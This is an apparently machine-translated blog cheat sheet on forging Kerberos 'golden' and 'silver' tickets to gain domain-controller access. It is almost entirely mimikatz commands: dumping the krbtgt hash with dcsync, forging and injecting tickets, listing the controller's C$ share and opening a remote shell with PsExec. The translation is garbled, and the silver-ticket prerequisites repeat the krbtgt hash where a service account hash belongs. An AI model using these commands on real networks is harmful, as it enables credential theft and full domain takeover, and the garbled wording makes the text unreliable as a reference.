Gold and silver bills bills get permission domain controller

Gold notes

Prerequisites

  1. Domain Name
  2. SID value of the field
  3. KRBTGT account domain Hash NTLM
  4. Fake user name (here administrator), can be any user or even non-existent users

Use

Download mimikatz of: https://github.com/gentilkiwi/mimikatz
PsExec download address: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

ipconfig /all    #获取域名(前提条件1)

whoami /all    #获取域SID值(前提条件2)

lsadump::dcsync /domain: /*域名*/  /user:krbtgt    #获取KRBTGT账户的 Hash NTLM(前提条件3)

klist purge    #删除票证

kerberos::golden /admin:administrator /domain: /*域名*/  /sid: /*SID*/  /krbtgt: /*Hash NTLM*/ /ptt    #伪造票据(前提条件4)

dir \\abc.test.com\c$    #查看域控的C盘目录(abc.test.com为域控全名)

PsExec.exe \\abc.test.com cmd    #使用PsExec获取一个cmdshell

Silver notes

Prerequisites

  1. Domain Name
  2. SID value of the field
  3. KRBTGT account domain Hash NTLM
  4. Fake user name (here is the test), can be any user or even non-existent users

Use

Counterfeit bill command is as follows:

kerberos::golden /domain: /*域名*/ /sid: /*SID值*/ /target: /*域控全名*/ /service:cifs /rc4:/*Hash NTLM*/ /user:test /ptt

Guess you like

Origin www.cnblogs.com/riyir/p/12640203.html